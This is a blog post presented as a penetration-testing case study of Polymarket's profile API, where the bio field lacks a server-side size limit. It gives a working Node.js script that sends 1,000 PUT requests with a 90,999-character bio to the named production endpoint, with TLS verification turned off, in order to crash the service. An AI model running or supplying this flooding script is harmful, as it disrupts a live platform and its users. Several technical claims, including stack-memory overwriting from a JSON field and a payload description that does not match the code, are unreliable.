Pentesting Polymarket

Ociper

Aug 30, 2024

About Polymarket

Polymarket is a decentralized information market platform that allows users to trade on the outcomes of real-world events using blockchain technology. Participants can create markets around various topics, such as elections or sports results, and trade shares based on their predictions. The price of shares reflects the perceived probability of a particular outcome, and after the event occurs, the market settles with payouts for those who predicted correctly. Polymarket operates using the PMK token for governance and staking, ensuring a transparent, decentralized trading experience.

blog images

Polymarket, a prominent prediction market platform, recently faced a critical vulnerability in its profile sanction mechanism. This flaw allowed attackers to inject a substantial amount of extraneous "junk" data into the database and API interface, leading to potential crashes and service disruptions. This case study delves into the technical details of the vulnerability, its exploitation, and the resulting impact on the platform.

Vulnerability Overview

The vulnerability resides in the profile sanction mechanism of Polymarket's API, specifically within the user profile creation and bio editing functionality. By exploiting this flaw, an attacker can generate excessive data payloads, overwhelming the database and API interface (gamma-api.polymarket.com). This can lead to a complete crash of the platform.

Affected Endpoints:

https://gamma-api.polymarket.com/profiles/${ID} (HTTP Method: PUT)
https://gamma-api.polymarket.com/

Exploitation Details

The flaw was identified in the process of creating or editing a user's bio. While the frontend HTML/JavaScript interface imposes a 200-character limit on the bio field, the API lacks proper validation for input size and type. This oversight allows attackers to bypass the frontend restrictions and submit malicious payloads directly to the API.

blog images

Through the API directly

blog images

Initial exploit testing:

Within large payload consisting of non-string data (e.g., & characters) was submitted to the bio field. This payload bypassed the server's validation checks and was successfully processed, resulting in a 204 No Content response with a significant delay, By repeatedly sending crafted HTTP requests with the large payload to the https://gamma-api.polymarket.com/profiles/${ID} endpoint, an attacker can cause the webserver process to overwrite parts of its stack memory. This manipulation alters the request handling flow, leading to a crash of the API interface.

const axios = require('axios');

const jsonData = { bio: '%'.repeat(90999) };

async function sendRequest() {
    try {
        const response = await axios.put('https://gamma-api.polymarket.com/profiles/ID', jsonData, {
            httpsAgent: new (require('https').Agent)({ rejectUnauthorized: false })
        });
        console.log(response.data);
    } catch (error) {
        console.error('Error:', error.message);
    }
}

const numRequests = 1000;
const interval = 100;

let requestCount = 0;

const intervalId = setInterval(() => {
    if (requestCount < numRequests) {
        sendRequest();
        requestCount++;
    } else {
        clearInterval(intervalId);
        console.log('All requests sent.');
    }
}, interval);

blog images

Conclusion

This case study highlights the importance of robust input validation and memory management in API design. The Polymarket vulnerability serves as a reminder that even seemingly minor oversights can lead to significant security incidents. By addressing these issues, organizations can safeguard their systems against similar exploits.